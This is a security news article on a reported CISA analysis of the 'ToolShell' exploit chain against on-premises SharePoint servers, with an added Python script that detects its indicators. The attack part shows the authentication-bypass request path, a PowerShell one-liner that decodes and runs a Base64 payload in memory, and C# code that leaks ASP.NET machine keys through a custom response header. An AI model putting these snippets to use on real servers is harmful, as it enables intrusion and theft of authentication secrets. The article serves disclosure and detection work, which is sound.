CISA Warns of ‘ToolShell’ Exploits Chain Attacks SharePoint Servers


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an urgent analysis in early July 2025, detailing a sophisticated exploit chain targeting on-premises Microsoft SharePoint servers.

Dubbed “ToolShell,” the campaign leverages two fresh vulnerabilities—CVE-2025-49706, a network spoofing flaw, and CVE-2025-49704, a remote code execution weakness—to gain unauthorized access and install stealthy webshells.

Initial compromise begins with a crafted request to SharePoint’s editing interface, invoking /_layouts/15/ToolPane.aspx?DisplayMode=Edit, which bypasses authentication checks and installs a malicious ASPX payload.


CISA analysts noted that once the attacker gains shell access, they chain a DLL-based machine key extractor—encoded as Base64—to harvest cryptographic secrets from the ASP.NET configuration.

The extracted keys are exfiltrated by injecting a custom HTTP header named X-TXT-NET into every response, facilitating remote decryption of protected ViewState and cookie values.

Detection signatures incorporate the unique header and the associated DLL hashes, enabling rapid identification of lingering infections.

According to CISA researchers, the final stage deploys a multi-function webshell (info3.aspx) that supports interactive command execution, file uploads, and credential harvesting through a challenge-response login form.

Attackers submit PowerShell commands as Base64-encoded strings:

# Base64-encoded payload (truncated in the original report)
$encoded = "JABiAGEAcwBlADYANABTAHQ..."
# Decode the payload to a string and pipe it to Invoke-Expression (iex), so it runs in memory without touching disk
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | iex

This snippet decodes the payload and executes it in memory, leaving minimal forensic footprints. The result is a persistent foothold that evades simple AV detection by avoiding disk writes.

ToolShell’s infection mechanism hinges on abusing SharePoint’s customization features.

The attacker submits a POST request to spinstall0.aspx, causing the server to write info3.aspx into the TEMPLATE\LAYOUTS directory. Once deployed, info3.aspx decodes another Base64 DLL (bjcloiyq.dll) to retrieve machine key parameters:

using System.Web;
using System.Web.Configuration;

// Read the <machineKey> element from the application's ASP.NET configuration
var section = (MachineKeySection)WebConfigurationManager.GetSection("system.web/machineKey");
// Concatenate both secrets into a single value ...
var headerValue = $"{section.ValidationKey}|{section.DecryptionKey}";
// ... and leak it to the caller in a custom response header
Response.Headers.Add("X-TXT-NET", headerValue);

This code, extracted via reflection, exfiltrates secrets that attackers later leverage to forge valid SharePoint cookies and bypass authentication entirely.

Persistence is ensured by chaining additional ASPX shells (spinstallb.aspx and spinstallp.aspx) that implement XOR-based payload decryption and re-encoding for command and control.

Continuous monitoring of the disclosed IOC list—including ASPX filenames, DLL SHA-256 hashes, and the X-TXT-NET header—is crucial for defenders to detect and disrupt ToolShell’s stealthy operations.
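The following triage helpers are an added example, not code from the CISA analysis or from this article. They turn the indicators named above into checks a defender can run: IIS W3C log records are scanned for the ToolPane.aspx?DisplayMode=Edit entry point and for requests to the ASPX filenames the report lists, HTTP responses are inspected for the X-TXT-NET exfiltration header, and a list of file paths from the LAYOUTS directory is swept for the same filenames. The log lines, response text and paths are constructed sample data; the field layout follows the standard IIS W3C format. Note that ToolPane.aspx with DisplayMode=Edit is also used by legitimate, authenticated page editing, so a hit on it is a lead to correlate with the source address and subsequent requests, not proof of compromise on its own.

```python
"""Triage helpers for the ToolShell indicators described in the CISA analysis.
Added example; the IIS log, response and path samples below are constructed."""
import re
from typing import Dict, Iterable, List, Optional

# ASPX filenames the report names as ToolShell artifacts
TOOLSHELL_ASPX = {"spinstall0.aspx", "info3.aspx", "spinstallb.aspx", "spinstallp.aspx"}
# Custom response header used to exfiltrate the machine key (compared case-insensitively)
EXFIL_HEADER = "x-txt-net"

# Constructed IIS W3C extended log; the #Fields line defines the column order
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-07-19 03:12:44 GET /_layouts/15/start.aspx - 10.0.0.5 200
2025-07-19 03:13:01 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 198.51.100.23 200
2025-07-19 03:13:07 GET /_layouts/15/spinstall0.aspx - 198.51.100.23 200
2025-07-19 03:13:20 POST /_layouts/15/info3.aspx - 198.51.100.23 200
2025-07-19 03:14:02 GET /sites/hr/default.aspx - 10.0.0.7 200
"""

# Constructed HTTP responses: one carrying the exfiltration header, one clean
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    "X-TXT-NET: PLACEHOLDER_VALIDATION_KEY|PLACEHOLDER_DECRYPTION_KEY\r\n\r\n<html></html>"
)
CLEAN_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C log text into dicts keyed by the names in the #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def find_toolshell_requests(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag requests matching the ToolShell entry point or the named ASPX shells."""
    hits = []
    for rec in records:
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "")
        name = stem.rsplit("/", 1)[-1].lower()
        reason: Optional[str] = None
        if name == "toolpane.aspx" and "displaymode=edit" in query.lower():
            reason = "ToolPane.aspx DisplayMode=Edit entry point (correlate, also used legitimately)"
        elif name in TOOLSHELL_ASPX:
            reason = f"request to ToolShell webshell filename {name}"
        if reason:
            hits.append({"time": f"{rec.get('date', '')} {rec.get('time', '')}",
                         "client": rec.get("c-ip", ""), "uri": stem, "reason": reason})
    return hits


def exfil_header_value(raw_response: str) -> Optional[str]:
    """Return the X-TXT-NET header value from a raw HTTP response, or None if absent."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == EXFIL_HEADER:
            return value.strip()
    return None


def find_shell_files(paths: Iterable[str]) -> List[str]:
    """Return the paths whose filename matches a known ToolShell ASPX name (handles / and \\)."""
    return [p for p in paths if re.split(r"[\\/]", p)[-1].lower() in TOOLSHELL_ASPX]


if __name__ == "__main__":
    for hit in find_toolshell_requests(parse_w3c(SAMPLE_IIS_LOG)):
        print(hit)
    print("exfil header:", exfil_header_value(SAMPLE_RESPONSE))
    # Constructed paths standing in for a directory listing of TEMPLATE\LAYOUTS
    print(find_shell_files([r"C:\...\TEMPLATE\LAYOUTS\info3.aspx", r"C:\...\TEMPLATE\LAYOUTS\start.aspx"]))
```

In practice, feed `parse_w3c` the real W3C logs from the SharePoint front ends and the response check a capture from a reverse proxy or packet capture, since default IIS logging does not record response headers; the filename sweep is the cheapest of the three and is worth running against the LAYOUTS directory on every server in the farm.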
